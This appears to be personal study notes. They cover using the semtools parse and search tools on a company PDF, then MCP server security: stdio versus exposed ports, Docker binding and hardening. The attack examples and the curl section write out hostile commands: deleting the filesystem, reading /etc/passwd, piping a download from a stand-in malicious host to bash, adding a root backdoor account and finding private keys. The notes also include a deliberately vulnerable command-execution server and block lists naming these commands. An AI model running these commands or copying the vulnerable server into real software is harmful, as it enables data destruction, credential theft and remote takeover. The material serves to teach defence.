# Semtools and MCP Learning Summary

## Semtools Installation and Setup

### Installation Process

1. **Initial Challenge**: Required Rust/Cargo version supporting Edition 2024
   - Original version: Cargo 1.68.2 (outdated)
   - Solution: Updated to Cargo 1.89.0 via `rustup update`

2. **Installation Command**:
   ```bash
   cargo install semtools
   ```

3. **Installed Executables**:
   - `parse` - Document parsing tool (located at `~/.cargo/bin/parse`)
   - `search` - Semantic search tool (located at `~/.cargo/bin/search`)

### Parse Tool Configuration

#### Configuration File Location
- Path: `~/.parse_config.json`

#### Required Configuration Structure
```json
{
  "api_key": "your_llama_cloud_api_key_here",
  "num_ongoing_requests": 10,
  "base_url": "https://api.cloud.llamaindex.ai",
  "check_interval": 5,
  "max_timeout": 3600,
  "max_retries": 10,
  "retry_delay_ms": 1000,
  "backoff_multiplier": 2.0,
  "parse_kwargs": {
    "parse_mode": "parse_page_with_agent",
    "model": "openai-gpt-4-1-mini",
    "high_res_ocr": "true",
    "adaptive_long_table": "true",
    "outlined_table_extraction": "true",
    "output_tables_as_HTML": "true"
  }
}
```

#### Key Configuration Learnings
- All fields are mandatory - missing any field causes errors
- Requires LlamaParse API key from cloud.llamaindex.ai
- Parse output is saved to `~/.parse/[filename].md`
- Supports advanced PDF parsing with OCR and table extraction

### Using Semtools

#### Parse Command
```bash
# Basic usage
parse "filename.pdf"

# With verbose output
parse --verbose "filename.pdf"

# Help
parse --help
```

**Features**:
- Converts PDFs to markdown format
- Extracts tables as HTML
- Handles complex layouts with AI assistance
- Preserves document structure

#### Search Command
```bash
# Basic semantic search
search "query terms" "file.md"

# With context lines
search "query" "file.md" -n 5

# Top-k results
search "query" "file.md" --top-k 5

# Help
search --help
```

**Features**:
- Semantic search (finds contextually relevant content)
- Returns similarity scores (lower = better match)
- Shows context around matches
- Supports multiple files/directories

### Practical Examples Performed

#### Example 1: Parsing the CompanyA PDF

**Command Used:**
```bash
parse "CompanyA - Intro H2 2024.pdf"
```

**Result:** Successfully parsed to `/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md`

**Sample Parsed Content:**
```markdown
# INTRODUCTION COMPANYA UK

## THE COMPANY AND PORTFOLIO AT A GLANCE

## COMPANYA | AT A GLANCE

> We specialise in creating software for a wide range of industries and technologies, actively playing a part in the digitisation of Europe.

> With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago.

## GROUP REVENUE 2023
- approx. **1.1 B. Euros**

## NUMEROUS AWARDS
| Year  | Award / Recognition                         |
|-------|---------------------------------------------|
| 2023  | Data, Analytics & AI Market Leader          |
| 2020  | [Award logo shown]                          |
```

#### Example 2: Semantic Search for Awards

**Command Used:**
```bash
search "awards achievements recognition excellence" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md"
```

**Results Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:446::453 (0.4192522861034296)
## Awards shown on trophies
- Beste Arbeitgeber ITK Great Place To Work 2020

/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:27::34 (0.639156086580848)
## NUMEROUS AWARDS
| Year  | Award / Recognition                         |
|-------|---------------------------------------------|
| 2023  | Data, Analytics & AI Market Leader          |
```

#### Example 3: Financial Performance Search

**Command Used:**
```bash
search "1.1 billion euros revenue" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" --top-k 5
```

**Results Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:21::28 (0.5080750291633499)
## GROUP REVENUE 2023
- approx. **1.1 B. Euros**

/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:10::17 (0.7265656264502557)
> With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago.
```

#### Example 4: Company Positioning Search

**Command Used:**
```bash
search "speed boat agility flexibility enterprise scalability" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" -n 5
```

**Key Result Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:183::194 (0.4164071779051679)
> CompanyA combines the professionalism and scalability of a large IT company with the agility and flexibility of a small IT service provider and thus offers you ...
> * ...a pronounced **service provider mentality**!
> * ...solution-oriented services with optimal **benefits**!
> * ...pragmatic, **fast solutions** and hands-on mentality!
> * ...a very high service quality designed for **speed**!
> * ...extraordinary **flexibility** in cooperation!
> * ...fast and variable **scalability** in the services - both OnShore and with CompanyA SmartShore!

**WE JUST DO IT!**
```

### Key Discoveries from Parsed Content

**Company Overview:**
- Founded 1997 in Germany, became CompanyA SE in 2019
- Over 10,000 employees across Europe
- €1.1 billion revenue (2023)
- 64 locations in Europe & UK

**Major Clients Found:**
```
COMMERZBANK, DEUTSCHE BUNDESBANK, Bayern LB, Munich RE, MAN, DAIMLER,
vodafone, T-Mobile, SwissLife, ZURICH, AOK, BARMER, Union Investment
```

**Industry Services Table Extracted:**
```html
Automotive Banking Health Insurance Life Sciences Manufacturing Industry Public Retail Utilities
```

**Unique Value Proposition Discovered:**
The company positions itself as combining "Speed Boat" agility with "Big Player" enterprise capabilities - offering both the flexibility of a small service provider and the scalability of a large corporation.

## MCP (Model Context Protocol) Security Insights

### Why Terminal Access MCP is Unsafe

1. **Unrestricted Command Execution**
   - Can execute ANY system command
   - Same privileges as running user
   - Direct file system access

2. **No Sandboxing**
   - Runs directly on host system
   - No container/VM isolation
   - Can affect other processes

3. **Security Risks**
   - Privilege escalation potential
   - Remote code execution vector
   - Data exfiltration capabilities
   - Lack of audit trails

### Safer MCP Usage Patterns

#### 1. Read-Only Operations
```json
{
  "tools": [
    {"name": "read_file", "permissions": "read-only"},
    {"name": "list_directory", "permissions": "read-only"}
  ]
}
```

#### 2. Containerization
```bash
docker run --read-only \
  --security-opt=no-new-privileges \
  --cap-drop=ALL \
  --user=nobody \
  mcp-server
```

#### 3. Whitelisted Commands
```json
{
  "allowed_commands": [
    "git status",
    "npm list",
    "python --version"
  ],
  "blocked_patterns": [
    "rm -rf",
    "sudo",
    "curl | bash"
  ]
}
```

#### 4. Use Stdio Mode (Recommended)
```bash
# Safer - uses stdio pipes
npx @modelcontextprotocol/server-name

# Riskier - exposes network port
npx @modelcontextprotocol/server-name --port 3000
```

### Best Practices for MCP

1. **Default Deny Policy**: Block everything by default, explicitly allow needed operations
2. **Principle of Least Privilege**: Run with minimal necessary permissions
3. **Comprehensive Logging**: Audit all operations
4. **Use Trusted Servers**: Stick to official/verified MCP implementations
5. **Rate Limiting**: Prevent abuse through request limits
6. **Approval Workflows**: Require confirmation for sensitive operations

### Safe MCP Configuration Example
```json
{
  "mcp_servers": {
    "filesystem": {
      "command": "npx",
      "args": ["@modelcontextprotocol/server-filesystem", "/safe/directory"],
      "permissions": {
        "read": true,
        "write": false,
        "execute": false
      }
    },
    "memory": {
      "command": "npx",
      "args": ["@modelcontextprotocol/server-memory"],
      "sandboxed": true
    }
  }
}
```

### Why Exposing Port 3000 (or Any Port) is Risky

#### 1. **Network Attack Surface**
When you expose a port like 3000:
```bash
# RISKY - Creates network listener
npx @modelcontextprotocol/server-name --port 3000
```

This opens port 3000 to network connections, meaning:
- Any process on your machine can connect
- If firewall is misconfigured, external attackers could connect
- Creates a persistent network service that can be discovered
- Enables port scanning and service enumeration

#### 2. **Localhost Still Has Risks**
Even binding to `127.0.0.1:3000` isn't completely safe:
- Other local processes can connect (including malware)
- Browser-based attacks via JavaScript `fetch()` or XHR
- Port scanning by local malicious software
- Shared systems allow other users to connect
- No built-in authentication on most MCP servers

#### 3. **Common Misconfiguration Dangers**
```bash
# VERY DANGEROUS - Binds to all interfaces
npx server --port 3000 --host 0.0.0.0

# Docker mistake - publishes the port on all host interfaces
docker run -p 3000:3000 mcp-server  # Exposed externally!
```

#### 4. **Missing Security Controls**
Network-exposed MCP servers typically lack:
- Authentication mechanisms
- Rate limiting
- Request validation
- Access controls
- Encryption (HTTP vs HTTPS)

#### 5. **Protocol Vulnerabilities**
HTTP/TCP protocols over network can suffer from:
- Man-in-the-middle attacks
- Request injection
- Buffer overflow exploits
- Protocol confusion attacks
- Session hijacking

#### 6. **Real-World Attack Scenarios**

**Scenario 1: Malware Exploitation**
```bash
# Malware discovers open port 3000
curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}'
```

**Scenario 2: Browser-Based Attack**
```javascript
// Malicious website exploits local MCP server
fetch('http://127.0.0.1:3000/api/files')
  .then(response => response.text())  // read the body before forwarding it
  .then(data => sendToAttacker(data))
```

**Scenario 3: Docker Misconfiguration**
```dockerfile
# EXPOSE only documents the port; it does not publish it by itself
EXPOSE 3000
# DANGEROUS - running with -p 3000:3000 publishes it on all host interfaces!
```

#### Why Stdio Mode is Safer

```bash
# SAFE - Uses stdio pipes, no network
npx @modelcontextprotocol/server-name
```

**Stdio advantages:**
- **No network exposure** - only parent process can communicate
- **Process isolation** - communication through pipes only
- **Automatic cleanup** - pipes close when the parent process exits, so the server normally shuts down
- **OS-level security** - leverages process permissions
- **No port scanning** - invisible to network tools
- **No remote access** - there is no listening socket to connect to

#### Network Security Best Practices (If Ports Are Required)

1. **Bind to Localhost Only**
   ```bash
   npx server --port 3000 --host 127.0.0.1
   ```

2. **Use Unix Domain Sockets Instead**
   ```bash
   # Better than TCP ports
   npx server --socket /tmp/mcp.sock
   chmod 600 /tmp/mcp.sock  # Restrict permissions
   ```

3. **Add Authentication Layer**
   ```json
   {
     "auth": {
       "type": "bearer",
       "token": "secure-random-token"
     }
   }
   ```

4. **Implement Rate Limiting**
   ```json
   {
     "rate_limit": {
       "requests_per_minute": 60,
       "max_connections": 5
     }
   }
   ```

5. **Use TLS/SSL for Encryption**
   ```bash
   # Use HTTPS instead of HTTP
   npx server --port 3000 --cert server.crt --key server.key
   ```

#### Architecture Comparison

**Network Mode (Risky):**
```
Claude Code → Network Stack → Port 3000 → MCP Server
                   ↑              ↑
               Attacker      Port Scanner
```

**Stdio Mode (Safe):**
```
Claude Code ←→ Stdio Pipes ←→ MCP Server
          (Process Isolation)
```

#### Key Principle
**Avoid network protocols when local IPC (Inter-Process Communication) suffices.** Network exposure should only be used when absolutely necessary and with proper security controls.

### Deep Dive: Why `docker run -p 3000:3000` Exposes to Internet

This is a critical concept that catches many developers off-guard. Let's break down exactly why this seemingly innocent command can expose a service to the internet:

#### How Docker's `-p` Flag Works

The `-p` (or `--publish`) flag creates port mapping from host to container:

```bash
-p [host_port]:[container_port]
-p 3000:3000
   ↑    ↑
   |    └── Port inside the container
   └── Port on your host machine (YOUR COMPUTER)
```

#### The Critical Detail: Default Binding Behavior

**By default, `-p 3000:3000` binds to `0.0.0.0:3000` on your host**, which means:

```bash
# What you type:
docker run -p 3000:3000 mcp-server

# What Docker actually does:
docker run -p 0.0.0.0:3000:3000 mcp-server
              ↑
              └── ALL network interfaces!
```

#### What `0.0.0.0` Actually Means

- `0.0.0.0` = "bind to all available network interfaces"
- This includes:
  - `127.0.0.1` (localhost/loopback)
  - Your WiFi IP (e.g., `192.168.1.100`)
  - Your Ethernet IP
  - **Your public IP address if directly connected**

#### Internet Exposure Scenarios

**1. Cloud/VPS Servers**
```bash
# Running on AWS, Azure, DigitalOcean, etc.
docker run -p 3000:3000 mcp-server
# Now accessible at: http://your-server-public-ip:3000
# Anyone on the internet can connect!
```

**2. Home Networks with Port Forwarding**
```bash
# Your router forwards port 3000, or has DMZ enabled
# Your service becomes accessible from outside your network
```

**3. Corporate Networks**
```bash
# Many corporate networks have direct routing
# Port 3000 becomes accessible to entire corporate network
# Could violate security policies
```

#### Real Attack Scenario

```bash
# You innocently run:
docker run -p 3000:3000 mcp-server

# Attacker from anywhere can now:
curl http://your-public-ip:3000/execute \
  -d '{"command": "cat /etc/passwd"}'

curl http://your-public-ip:3000/files \
  -d '{"action": "list", "path": "/"}'
```

#### How to Run Docker Safely

**Option 1: Explicit Localhost Binding (Recommended)**
```bash
# SAFE - Only accessible from your machine
docker run -p 127.0.0.1:3000:3000 mcp-server
              ↑
              └── Explicitly bind to localhost only
```

**Option 2: Use Docker Networks (Most Secure)**
```bash
# SAFE - Internal Docker network only, no external ports
docker network create mcp-network
docker run --network mcp-network --name mcp-server mcp-server
docker run --network mcp-network my-app
# Containers can talk to each other, but no external access
```

**Option 3: Unix Domain Sockets**
```bash
# SAFE - Filesystem-based communication
docker run -v /tmp:/tmp mcp-server --socket /tmp/mcp.sock
# No network exposure at all
```

#### How to Check If You're Currently Exposed

```bash
# Check what's listening on port 3000
netstat -an | grep 3000
# OR
ss -tulpn | grep 3000

# If you see this, you're EXPOSED:
tcp  0.0.0.0:3000  *:*  LISTEN  # BAD - listening on all interfaces

# If you see this, you're SAFE:
tcp  127.0.0.1:3000  *:*  LISTEN  # GOOD - localhost only
```

#### Scan for Exposed Services

```bash
# Check from external perspective
nmap your-public-ip
# If port 3000 shows up, you're exposed!

# Check Docker port mappings
docker port container-name
# Shows all port mappings for container
```

#### Common Dangerous Misunderstandings

1. **"It's just Docker, it's contained"**
   - Docker does not restrict who can reach a published port
   - The `-p` flag deliberately opens a path through the container's network isolation

2. **"I'm behind NAT/firewall"**
   - NAT isn't a security boundary
   - Many routers have UPnP that auto-opens ports
   - Docker can modify firewall rules automatically

3. **"It's just for development/testing"**
   - Attackers continuously scan for development services
   - Test servers often have weaker security
   - "Temporary" often becomes permanent

4. **"My cloud provider protects me"**
   - Most cloud instances have public IPs
   - Security groups/firewalls must be explicitly configured
   - Default configurations often allow wide access

#### Docker Security Best Practices

**1. Never Use Default Port Binding in Production**
```bash
# NEVER do this in production:
docker run -p 3000:3000 app

# Always specify bind address:
docker run -p 127.0.0.1:3000:3000 app
```

**2. Use Docker Networks for Inter-Container Communication**
```bash
# Create isolated network
docker network create --driver bridge app-network

# Run containers on network
docker run --network app-network api-server
docker run --network app-network database
# No external ports needed!
```

**3. Implement Reverse Proxy Pattern**
```bash
# Only expose reverse proxy (nginx, traefik)
docker run -p 127.0.0.1:80:80 nginx
docker run --network internal-network app1
docker run --network internal-network app2
# Apps not directly accessible from outside
```

**4. Use Environment-Specific Configurations**
```yaml
# docker-compose.yml
version: '3'
services:
  mcp-server:
    # Development
    ports:
      - "127.0.0.1:3000:3000"  # Safe local binding
    # Production
    networks:
      - internal  # No external ports

# The network referenced above must be declared
networks:
  internal: {}
```

#### Firewall Interaction Warning

Docker manipulates iptables rules automatically:

```bash
# Docker adds rules that can bypass your firewall!
# Check what Docker added:
iptables -L DOCKER

# Docker rules often come BEFORE your custom rules
# Your firewall config might be ignored!
```

#### The Bottom Line

**On a host with a public IP and no blocking firewall, `docker run -p 3000:3000` is equivalent to running a public web server.** It tells Docker to accept connections on **every network interface** and forward them to your container. Unless you explicitly specify `127.0.0.1`, Docker binds the port to all interfaces.

This is why:
- Stdio mode is preferred for MCP servers (no network at all)
- If ports are needed, always bind to `127.0.0.1:port`
- Never omit the bind address in production
- Use Docker networks for internal communication
- Regularly audit your exposed ports with `netstat` or `nmap`

**Remember: Convenience is the enemy of security. Always be explicit about network exposure.**

### Understanding Attack Commands: The `-d` Flag in curl

Many of the attack examples in this document use curl with the `-d` flag. Understanding what this flag does is crucial for comprehending the security risks:

#### What the `-d` Flag Does

The `-d` flag in curl stands for "**data**" and is used to send HTTP POST data in the request body:

```bash
curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}'
     ↑                                ↑
     |                                └── POST data (JSON payload)
     └── Target URL
```

#### Technical Breakdown

1. **HTTP Method**: `-d` automatically changes the request from GET to POST
2. **Content-Type**: Sets `Content-Type: application/x-www-form-urlencoded` by default
3. **Request Body**: Places the data in the HTTP request body
4. **JSON Data**: The string is sent unchanged as the POST payload; curl does not check that it is valid JSON

#### The HTTP Request Generated

```http
POST /execute HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

{"command": "rm -rf /"}
```

#### What `rm -rf /` Actually Does

This is one of the most destructive commands possible on Unix/Linux systems:

- `rm` = remove/delete command
- `-r` = recursive (delete directories and all their contents)
- `-f` = force (don't prompt for confirmation, ignore nonexistent files)
- `/` = root directory (the entire filesystem)

**Translation**: "Delete everything on the system without asking for confirmation"

GNU `rm` refuses to operate on `/` unless `--no-preserve-root` is given, but close variants such as `rm -rf /*` or `rm -rf ~` have no such safeguard.

#### Real-World Impact of This Attack

If an MCP server executes this command, the results are catastrophic:

- **Operating System**: Completely destroyed
- **All Applications**: Deleted permanently
- **User Data**: Gone forever (documents, databases, configurations)
- **System Recovery**: Impossible without complete restoration from backups
- **Server Status**: Completely bricked and unusable
- **Business Impact**: Complete system downtime, potential data loss

#### Other Dangerous Commands via `-d`

```bash
# Exfiltrate sensitive data
curl -d '{"command": "cat /etc/passwd"}' http://127.0.0.1:3000/execute

# Download and execute malware
curl -d '{"command": "curl malicious-site.com/malware.sh | bash"}' url

# Create backdoor access
curl -d '{"command": "echo \"hacker::0:0::/root:/bin/bash\" >> /etc/passwd"}' url

# Steal environment variables (often contain secrets)
curl -d '{"command": "env"}' http://127.0.0.1:3000/execute

# Access private keys
curl -d '{"command": "find /home -name \"*.key\" -o -name \"id_rsa\""}' url
```

#### Other curl `-d` Flag Variations

```bash
# Send JSON with proper content-type
curl -d '{"key": "value"}' -H "Content-Type: application/json" url

# Send form data
curl -d "username=admin&password=secret" url

# Send from file
curl -d @malicious-payload.json url

# Multiple data parameters
curl -d "field1=value1" -d "field2=value2" url

# Send pre-encoded data (-d does not URL-encode; --data-urlencode does)
curl -d "message=hello%20world" url
```

#### Why These Examples Are So Effective

1. **No Authentication**: Most development MCP servers have no authentication
2. **Full Privileges**: MCP servers often run with the same privileges as the user
3. **Direct Execution**: Commands execute immediately without validation
4. **No Logging**: Many servers don't log incoming commands
5. **Network Accessible**: `-p 3000:3000` makes them reachable from any network the host is attached to

#### The Security Lesson

The `-d` flag itself is completely innocent - it's just a way to send data with HTTP POST requests. The danger comes from:

1. **Unsecured Endpoints**: Servers that execute any command without validation
2. **Network Exposure**: Making these endpoints accessible over the network
3. **Lack of Input Validation**: Not sanitizing or restricting incoming commands
4. **Missing Authentication**: No verification of who is sending commands
5. **Excessive Privileges**: Running servers with unnecessary system access

#### Defense Against These Attacks

**1. Never Expose Command Execution Endpoints**
```bash
# DON'T create endpoints like:
/execute
/command
/run
/shell
```

**2. Use Whitelisted Operations Instead**
```json
{
  "allowed_operations": [
    "get_status",
    "list_files",
    "read_config"
  ],
  "blocked_operations": ["execute", "command", "shell"]
}
```

**3. Input Validation and Sanitization**
```javascript
// Validate incoming data
if (data.command.includes('rm -rf')) {
  throw new Error('Destructive command blocked');
}

// Use command whitelists
const allowedCommands = ['git status', 'npm version'];
if (!allowedCommands.includes(data.command)) {
  throw new Error('Command not allowed');
}
```

**4. Run with Minimal Privileges**
```bash
# Create restricted user
useradd --no-create-home --shell /bin/false mcp-user

# Run server as restricted user
sudo -u mcp-user node mcp-server.js
```

**5. Use Stdio Mode (Eliminates Network Attacks)**
```bash
# SAFE - No network exposure possible
npx @modelcontextprotocol/server-name

# DANGEROUS - Network exposed
npx @modelcontextprotocol/server-name --port 3000
```

#### Key Takeaway

**The `-d` flag is just the delivery mechanism. The real danger is having network-accessible endpoints that execute arbitrary commands without proper security controls.**

This is why stdio mode is strongly recommended for MCP servers - it eliminates the entire network attack surface.

## STDIO Mode vs Network Protocols: OSI Model Deep Dive

Understanding why STDIO mode is fundamentally safer requires understanding the difference between **Inter-Process Communication (IPC)** and **network protocols** in the context of the OSI model.

### STDIO Mode Explained

**STDIO (Standard Input/Output) mode** uses operating system pipes for communication instead of network sockets:

```bash
# STDIO Mode (SAFE) - Uses OS pipes
npx @modelcontextprotocol/server-name

# Network Mode (RISKY) - Uses TCP/IP sockets
npx @modelcontextprotocol/server-name --port 3000
```

### OSI Model Attack Surface Comparison

#### Network Mode - Full OSI Stack Exposure

Network-based MCP servers traverse the complete OSI stack, creating attack surfaces at every layer:

```
┌─────────────────────────────────────────────┐
│ Layer 7: Application (HTTP, MCP Protocol)   │ ← Command injection attacks
├─────────────────────────────────────────────┤
│ Layer 6: Presentation (JSON encoding)       │ ← Data manipulation attacks
├─────────────────────────────────────────────┤
│ Layer 5: Session (HTTP sessions)            │ ← Session hijacking
├─────────────────────────────────────────────┤
│ Layer 4: Transport (TCP)                    │ ← Port scanning, DoS attacks
├─────────────────────────────────────────────┤
│ Layer 3: Network (IP routing)               │ ← IP spoofing, routing attacks
├─────────────────────────────────────────────┤
│ Layer 2: Data Link (Ethernet)               │ ← ARP poisoning, MAC spoofing
├─────────────────────────────────────────────┤
│ Layer 1: Physical (Network interface)       │ ← Physical network access
└─────────────────────────────────────────────┘
```

#### STDIO Mode - Zero Network Stack Involvement

STDIO mode completely bypasses the network stack, operating at the OS process level:

```
┌─────────────────────────────────────────────┐
│ Application Layer (MCP Protocol)            │ ← Only accessible to parent process
├─────────────────────────────────────────────┤
│ Operating System IPC (Pipes)                │ ← Protected by process isolation
├─────────────────────────────────────────────┤
│ Kernel System Calls                         │ ← OS enforces access controls
├─────────────────────────────────────────────┤
│ Process Management                          │ ← Cannot be accessed remotely
└─────────────────────────────────────────────┘
```

### Communication Flow Comparison

#### Network Mode Communication Path

```bash
# Network mode creates this communication path:
Claude Code ──→ TCP Socket ──→ Network Stack ──→ Port 3000 ──→ MCP Server
     │              │                │               │             │
  Layer 7        Layer 4        Layers 3-1      Layers 4-7      Layer 7

# Attack vector exists:
Attacker ──→ Internet ──→ Your Network ──→ Port 3000 ──→ MCP Server
```

#### STDIO Mode Communication Path

```bash
# STDIO mode creates this isolated path:
Claude Code ──→ Process Fork ──→ OS Pipes ──→ MCP Server
     │               │              │             │
Parent Process  Child Process    OS IPC     Child Process

# NO network layers involved!
# Attacker has NO network path to reach MCP Server
```

### Inter-Process Communication (IPC) vs Network Protocols

#### IPC Mechanisms (All Local, Secure)

**STDIO pipes are one form of IPC. The IPC mechanisms listed here are all local to one machine:**

```c
// Simplified view of STDIO pipe creation
#include <unistd.h>

int pipe_fd[2];
char buffer[16];

// Creates a one-way pipe: pipe_fd[0] is the read end, pipe_fd[1] the write end
// (stdin and stdout each use their own pipe, one per direction)
pipe(pipe_fd);

// Parent (Claude Code) writes to pipe
write(pipe_fd[1], "get status", 10);

// Child (MCP Server) reads from pipe
read(pipe_fd[0], buffer, 10);

// This communication is invisible to network tools
// A process without access to these file descriptors cannot read or inject data
```

**Other IPC Mechanisms (All Local):**
- **Pipes** (STDIO mode uses these)
- **Named pipes (FIFOs)** - Filesystem-based pipes
- **Unix domain sockets** - Local socket files
- **Shared memory** - Direct memory sharing
- **Message queues** - OS-managed message passing
- **Semaphores** - Process synchronization

#### Network Protocols (Can Be Remote, Dangerous)

**Network sockets are designed for remote access:**

```c
// Network socket creation (dangerous for MCP)
#include <netinet/in.h>
#include <sys/socket.h>

int sock = socket(AF_INET, SOCK_STREAM, 0);  // Internet socket

struct sockaddr_in addr = {
    .sin_family = AF_INET,
    .sin_port = htons(3000),
    .sin_addr.s_addr = INADDR_ANY  // 0.0.0.0 - ALL interfaces!
};

bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5);  // Ready to accept connections

// This socket can accept connections from:
// - localhost (127.0.0.1)
// - Local network (192.168.x.x)
// - Internet (any public IP)
// - Docker containers
// - VPN connections
```

### Process Isolation Model (STDIO)

STDIO mode creates strong process isolation enforced by the operating system:

```bash
┌──────────────────┐   Pipes    ┌──────────────────┐
│   Claude Code    │◄──────────►│    MCP Server    │
│    (Parent)      │            │     (Child)      │
│   PID: 1234      │            │    PID: 1235     │
│   User: alice    │            │   User: alice    │
└──────────────────┘            └──────────────────┘
         ▲                               ▲
         │                               │
         │     OS Process Management     │
    ┌────▼───────────────────────────────▼────┐
    │         Operating System Kernel         │
    │  • Enforces process boundaries          │
    │  • Manages pipe permissions             │
    │  • Prevents external access             │
    │  • Cleans up on process death           │
    └─────────────────────────────────────────┘
```

### Security Properties of Each Approach

#### STDIO Mode Security Properties

```bash
✅ Process Isolation: Communication only between parent/child
✅ No Network Exposure: Cannot be reached from network
✅ Automatic Cleanup: Pipes close when parent exits, so the child normally shuts down
✅ OS Access Control: Kernel enforces permissions
✅ No Port Scanning: Invisible to network discovery
✅ No Remote Access: No listening socket exists to connect to
✅ Firewall Irrelevant: No network traffic to filter
✅ No Authentication: Not needed - process isolation provides security
```

#### Network Mode Security Weaknesses

```bash
❌ Network Exposure: Accessible from network interfaces
❌ Port Discovery: Can be found via port scanning
❌ Authentication Gap: Often lacks proper auth mechanisms
❌ Firewall Dependency: Security depends on external firewall config
❌ Protocol Attacks: Vulnerable to HTTP/TCP-level attacks
❌ Remote Accessibility: Can be reached from internet if misconfigured
❌ Persistent Service: Continues running independently
❌ Multi-layer Risk: Attack surface across all OSI layers
```

### Practical Code Examples

#### STDIO Mode Implementation (Secure)

**Programming Language Note**: *The following example is written in **JavaScript** for the **Node.js** runtime environment. Node.js is a JavaScript runtime that allows JavaScript to run on servers and desktops (not just in web browsers). It provides APIs for system operations like spawning processes and file management.*

```javascript
// How Claude Code securely spawns MCP server via STDIO
const { spawn } = require('child_process');

// Spawn child process with stdio pipes
const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], {
  stdio: ['pipe', 'pipe', 'pipe']  // stdin, stdout, stderr pipes
});

// Secure communication via pipes
mcpServer.stdin.write(JSON.stringify({
  method: "get_status",
  id: 1
}) + '\n');

// Receive response via stdout pipe
// Note: a 'data' chunk may hold a partial message or several messages;
// real code should buffer the stream and split on '\n' before parsing
mcpServer.stdout.on('data', (data) => {
  const response = JSON.parse(data.toString());
  console.log('Secure response:', response);
});

// The pipes close when Claude Code exits, so the server normally shuts down
// NO NETWORK INVOLVEMENT AT ANY LEVEL
// Processes without these pipe handles cannot access this communication channel
```

**Code Explanation for Non-JavaScript Readers:**

```javascript
// Line-by-line breakdown:

// 1. Import Node.js module for creating child processes
const { spawn } = require('child_process');
//    ↑ Destructuring assignment (extracts 'spawn' function)
//                  ↑ CommonJS module import (Node.js style)

// 2. Create a new child process running the MCP server
const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], {
//    ↑ Variable to hold process reference
//                      ↑ Command to run ('npx' - Node package executor)
//                             ↑ Arguments passed to the command
  stdio: ['pipe', 'pipe', 'pipe']  // Configure input/output streams
  //      ↑ stdin ↑ stdout ↑ stderr (standard streams)
});

// 3. Send data TO the child process via its input stream
mcpServer.stdin.write(JSON.stringify({
//        ↑ stdin = standard input (pipe TO child)
//                    ↑ Convert JavaScript object to JSON string
  method: "get_status",  // JavaScript object with method name
  id: 1                  // and request ID
}) + '\n');              // Add newline character (message delimiter)

// 4. Listen FOR data FROM the child process via its output stream
mcpServer.stdout.on('data', (data) => {
//        ↑ stdout = standard output (pipe FROM child)
//               ↑ Event listener pattern
//                          ↑ Arrow function (ES6 syntax)
  const response = JSON.parse(data.toString());
  //               ↑ Convert received bytes to string, then parse JSON
  console.log('Secure response:', response);
  // ↑ Print to console (like printf, print, echo in other languages)
});
```

**Key JavaScript/Node.js Concepts:**

1. **`require()`**: Node.js way to import modules (like `import` in Python or `#include` in C)
2. **`const`**: Declares a binding that cannot be reassigned (the object it refers to can still be modified)
3. **`spawn()`**: Node.js function to create child processes
4. **`stdio`**: Configuration for Standard Input/Output streams
5. **`.write()`**: Method to send data through a pipe
6. **`.on()`**: Event listener pattern (similar to callbacks)
7. **Arrow functions `=>`**: Modern JavaScript function syntax
8. **`JSON.stringify()`/`JSON.parse()`**: Convert between objects and JSON strings

**Equivalent Concepts in Other Languages:**

```python
# Python equivalent (conceptual)
import subprocess
import json

# Spawn child process with pipes
process = subprocess.Popen(
    ['npx', '@modelcontextprotocol/server-memory'],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

# Send data to child
request = json.dumps({"method": "get_status", "id": 1}) + "\n"
process.stdin.write(request.encode())
process.stdin.flush()  # Without this the request can sit in the buffer and readline() blocks

# Read response from child
response_data = process.stdout.readline()
response = json.loads(response_data.decode())
print("Secure response:", response)
```

```bash
# Bash equivalent (conceptual)
# Send one request via echo and a pipe; the server's stdin closes after it
echo '{"method": "get_status", "id": 1}' | npx @modelcontextprotocol/server-memory

# The pipes are automatically managed by the shell
```

**Why This Code is Secure:**
- **No network ports**: Uses process pipes, not TCP/UDP sockets
- **Process isolation**: Only parent can communicate with child
- **Automatic cleanup**: The child's pipes close when the parent exits, so it normally shuts down
- **OS-level protection**: Kernel enforces access controls
- **No external visibility**: Cannot be discovered by network tools

#### Network Mode Implementation (Vulnerable)

```javascript
// Dangerous network-based MCP server
const express = require('express');
const { exec } = require('child_process');
const app = express();

app.use(express.json());

// DANGEROUS: Command execution endpoint
app.post('/execute', (req, res) => {
  const { command } = req.body;

  // NO INPUT VALIDATION
  // NO AUTHENTICATION
  // NO RATE LIMITING
  exec(command, (error, stdout, stderr) => {
    res.json({ output: stdout, error: stderr });
  });
});

// EXPOSES TO ALL NETWORK INTERFACES
app.listen(3000, '0.0.0.0', () => {
  console.log('MCP server exposed on port 3000');
  // Attack vectors now available:
  // - Same machine: curl localhost:3000
  // - Local network: curl 192.168.1.100:3000
  // - Internet: curl your-public-ip:3000
  // - Container networks: curl container-ip:3000
});
```

### Attack Surface Analysis by OSI Layer

#### Network Mode - Vulnerabilities at Each Layer

```bash
# Layer 7 (Application):
- Command injection via HTTP POST
- Authentication bypass
- Input validation failures
- Protocol confusion attacks

# Layer 6 (Presentation):
- JSON parsing vulnerabilities
- Encoding manipulation
- Data format attacks

# Layer 5 (Session):
- Session hijacking
- Connection state attacks
- Keep-alive exploitation

# Layer 4 (Transport):
- TCP port scanning
